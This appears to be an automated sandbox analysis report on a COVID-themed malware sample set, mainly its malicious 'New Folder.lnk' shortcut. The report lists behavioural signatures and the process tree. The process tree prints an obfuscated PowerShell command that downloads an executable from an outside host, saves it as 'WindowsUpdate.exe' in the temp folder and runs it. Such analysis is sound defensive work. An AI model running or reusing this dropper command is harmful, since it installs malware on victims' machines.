Overview
overview
10Static
static
NewCovid-2...21.exe
windows7_x64
10NewCovid-2...21.exe
windows10-2004_x64
10NewCovid-2...ed.pdf
windows7_x64
1NewCovid-2...ed.pdf
windows10-2004_x64
1NewCovid-2...er.lnk
windows7_x64
10NewCovid-2...er.lnk
windows10-2004_x64
10NewCovid-2...ic.rtf
windows7_x64
8NewCovid-2...ic.rtf
windows10-2004_x64
1Analysis
-
max time kernel
129s -
max time network
133s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
28-02-2022 03:16
Static task
static1
Behavioral task
behavioral1
Sample
NewCovid-21/08042021.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
NewCovid-21/08042021.exe
Resource
win10v2004-en-20220112
Behavioral task
behavioral3
Sample
NewCovid-21/GEO-CFUND-2009_CCM Agreement_Facesheet - signed.pdf
Resource
win7-20220223-en
Behavioral task
behavioral4
Sample
NewCovid-21/GEO-CFUND-2009_CCM Agreement_Facesheet - signed.pdf
Resource
win10v2004-en-20220113
Behavioral task
behavioral5
Sample
NewCovid-21/New Folder.lnk
Resource
win7-en-20211208
Behavioral task
behavioral6
Sample
NewCovid-21/New Folder.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral7
Sample
NewCovid-21/Statistic.rtf
Resource
win7-en-20211208
Behavioral task
behavioral8
Sample
NewCovid-21/Statistic.rtf
Resource
win10v2004-en-20220113
General
-
Target
NewCovid-21/New Folder.lnk
Malware Config
Extracted
http://buking.site/soft/08042021.exe
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2804 powershell.exe 2804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2804 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1736 wrote to memory of 2564 1736 cmd.exe 79 PID 1736 wrote to memory of 2564 1736 cmd.exe 79 PID 2564 wrote to memory of 2804 2564 cmd.exe 80 PID 2564 wrote to memory of 2804 2564 cmd.exe 80
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\NewCovid-21\New Folder.lnk"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" && C:\Windows\System32\cmd.exe /c poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://buk'+'ing.si'+'te'+'/so'+'ft'+'/08'+'04'+'2021.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://buk'+'ing.si'+'te'+'/so'+'ft'+'/08'+'04'+'2021.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-